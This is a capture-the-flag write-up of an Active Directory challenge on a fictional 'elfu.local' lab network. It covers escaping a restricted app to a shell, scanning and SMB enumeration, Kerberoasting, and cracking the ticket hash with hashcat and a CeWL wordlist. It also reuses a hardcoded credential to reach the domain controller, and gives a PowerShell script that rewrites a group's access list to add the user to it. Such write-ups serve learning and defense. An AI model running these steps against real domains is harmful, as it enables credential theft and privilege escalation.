
Getting the hints
In order to black the naughty IPs and get the hint, fail2ban needs to be configure as the following:
/etc/fail2ban/filter.d/hohono.conf
[Definition]
failregex = ^.* Failed login from <HOST> for .*$
^.* Invalid heartbeat .* from <HOST>$
^.* from <HOST> rejected .*$
^.* <HOST> sent a malformed .*$
/etc/fail2ban/jail.d/hohono.conf
[hohono]
enabled = true
logpath = /var/log/hohono.log
findtime = 3600
maxretry = 10
filter = hohono
action = hohono
/etc/fail2ban/action.d/hohono.conf
[Definition]
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>
The challenge
Getting access to the machine
To start the challenge, we need to escape this application:

Click on CTRL+D to get Python console:

Use os.system to get shell
import os
os.system('/bin/bash')

Let’s make /bin/bash out default shell using chsh:

Recon
rzcmxnacvh@grades:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 21967028 bytes 2041704471 (2.0 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24790319 bytes 3583308774 (3.5 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
rzcmxnacvh@grades:~$ nmap 172.17.0.2/24
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-06 04:29 UTC
Nmap scan report for 172.17.0.1
Host is up (0.00050s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap scan report for grades.elfu.local (172.17.0.2)
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap scan report for 172.17.0.3
Host is up (0.00051s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
<strong>Nmap scan report for 172.17.0.4
</strong>Host is up (0.00056s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
42/tcp open nameserver
<strong>53/tcp open domain</strong>
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
636/tcp open ldapssl
1024/tcp open kdm
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap scan report for 172.17.0.5
Host is up (0.00054s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.01 seconds
Intersting SMB service (port 445) in the machines *3,*4, and *5. Let’s have a look on what we have access to:
ovvvhdiilp@grades:~$ smbclient -L 172.17.0.4
Enter WORKGROUP\ovvvhdiilp's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
elfu_svc_shr Disk elfu_svc_shr
research_dep Disk research_dep
IPC$ IPC IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
It seems that our goal will be to have access to research_dep! Let’s do it.
Finding the Domain Controller
According to the hint (next screenshot). Some other interesting machines (except the 172.17.0.4/28 ones) are present with the range 10.x.x.x. Let’s discover the:

# Get 10.x.x.x ips within the network
ovvvhdiilp@grades:~$ ip route
default via 172.17.0.1 dev eth0
10.128.1.0/24 via 172.17.0.1 dev eth0
10.128.2.0/24 via 172.17.0.1 dev eth0
10.128.3.0/24 via 172.17.0.1 dev eth0
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.2
Finding the domain controller. We run the nmap script dap-rootdse on the different IP ranges:
ovvvhdiilp@grades:~$ nmap -sT -Pn -n --open 10.128.1.0/24 -sV -p389 --script ldap-rootdse
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 01:25 UTC
Nmap scan report for 10.128.1.53
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: elfu.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 3
| forestFunctionality: 3
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=elfu,DC=local
| ldapServiceName: elfu.local:dc01$@ELFU.LOCAL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| ...
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=elfu,DC=local
| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=elfu,DC=local
| namingContexts: DC=elfu,DC=local
| namingContexts: CN=Configuration,DC=elfu,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=elfu,DC=local
| namingContexts: DC=DomainDnsZones,DC=elfu,DC=local
| namingContexts: DC=ForestDnsZones,DC=elfu,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 174816
| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=elfu,DC=local
| dnsHostName: DC01.elfu.local
| defaultNamingContext: DC=elfu,DC=local
| currentTime: 20220107012603.0Z
|_ configurationNamingContext: CN=Configuration,DC=elfu,DC=local
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (256 hosts up) scanned in 8.38 seconds
Getting more details about Ldap
Knowing the domain controller, 10.128.1.53 we can now launch the ldapdomaindump which is present in the grades machine:
ovvvhdiilp@grades:~$ ldapdomaindump -u "ELFU\ovvvhdiilp" "ldap://10.128.1.53:389" Password:
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

It generates the above files that provide details about the domain stored in in different formats, at this stage this data doesn’t make us really progress. let’s keep it aside, we will for sure need it later.
Finding service principal names
Let’s new try the PowerShell script GetUserSPNs.py which is present in the machine:

Interesting. it lists up elfu_svc who is apparently owning some of the shared SMB we discovered in the beginning which is elfu_svc_shr located in 172.17.0.4.
Let’s execute the same GetUserSPNs.py with -request argument to request a TGS

We now have a krb5tgs that we need to decrypt in order to get the user elfu_svc’s password.
Getting elfu_svc password
I used hashcat for this decryption. In my first attempts, I used based on rockyou.txt as a word list, it didn’t work. Based on the hints, I then added the rule OneRuleToRuleThemAll.rule which made hashcat estimate the decryption to take more than three days. Deception. I interrupted it and double checked the hints – again.
I finally realised that I need to use a dedicated world list that can be generated using CeWL. CeWL well parse a website (URL provided as argument) and gather all the present words. I used the ELF University website as argument in my fist failed attempt. I then and based on the hints added the argument –with-number to also include to strings that contain number.
ruby cewl -d 10 -m 5 --with-number -w elfu_words_with_numbers.txt https://register.elfu.org/register
I fed the new wordlist to hashcat, and bingo w’ve finally got elfu_svc password Snow2021!

Getting ssh access to the domain controller
Let’s now have a look on the shared folder of elfu_svc:

It contains tons of PS1 scripts. Promising. let’s analyse their content. I wrote this short Python script to download them.
import os
content = open('all_files_in_elfu_svc_shr.txt').readlines()
for line in content:
try:
script_name=line.split(' ')[0]
print (script_name)
cmd='smbclient -E -U elfu_svc \\\\\\\\172.17.0.4\\\\elfu_svc_shr \"Snow2021!\" -c "get '+script_name+'"'
print(cmd)
os.system(cmd)
except:
pass
I first tried to grep “passoword”, “username” and similar. I find some credentials like a username called “LabAdmin” that I tested in different location but they weren’t interesting.
rtscahotny@grades:~/all_files_in_elfu_svc$ grep -i password= *
CreateVMFleetDisk.ps1: $AdminPassword=Read-Host
Generate-SymbolsInNavContainer.ps1: $ProcessArguments += ", ntauthentication=0, username=""$($sqlCredential.UserName)"", password=""$([System.Runtime.InteropServices
.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($sqlCredential.Password)))"""
LabConfig.ps1:$LabConfig=@{ DomainAdminName='LabAdmin'; AdminPassword='LS1setup!'; Prefix = 'MSLab-' ; DCEdition='4'; Internet=$true ; AdditionalNetworksConfig=@(); VMs=@()}
LabConfig.ps1: AdminPassword="LS1setup!"; # Used during 2_CreateParentDisks. If changed after, it will break the functionality of 3_Deploy.ps1
New-NavContainer.ps1: "--env securePassword=$encPassword",
New-NavContainer.ps1: "--env databaseSecurePassword=$encDatabasePassword"
New-NavContainer.ps1: "--env encryptionSecurePassword=$encDatabasePassword"
I then make a grep with “elfu” and I got the following interesting resutl:

let’s have a look on the script GetProcessInfo.ps1:

And execute it:

The script makes the used remote_elf make an ssh connexion to the DC and gather the running processes. Inspired by this script, we now can login to the DC using the following lines:
$SecStringPassword="76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred

Giving my user access to research_dep shared folder
Once in the domain controller, I made an attempt to run the following PS1 script to grand my user permission to the Domain Admin group:
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=elfu,DC=local"
$username = "rtscahotny"
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"),([System.Security.AccessControl.AccessControlType] "Allow"),$propGUID,$inheritanceType,$nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
$secOptions=$domainDirEntry.get_Options()
$secOptions.SecurityMasks=[System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.psbase.get_ObjectSecurity().addAccessRule($ACE)
$domainDirEntry.psbase.CommitChanges()
$domainDirEntry.dispose()
It didn’t worked saying that it cannot commit changes.

So we need to find another way giving my user access to the shared research folder.
As our goal is to gain access to a research shared folder, let’s make a grep with “research” on the files we previously got using ldapdomaindump.

As you can see we now know that members of the group “Research Department” have access to the shared folder we are interested in. I now need to append my user to the this group. What about changing “Domain Admins” by “Research Department” in first line of the above script? let’s give this a try:

No error messages! it seems the be done. We now need to my used to the Group:

Let’s now logout from the DC and try accessing the research shared folder:

I then got the PDF into my local machine using scp as the following. The first secret ingredient is Kindness!
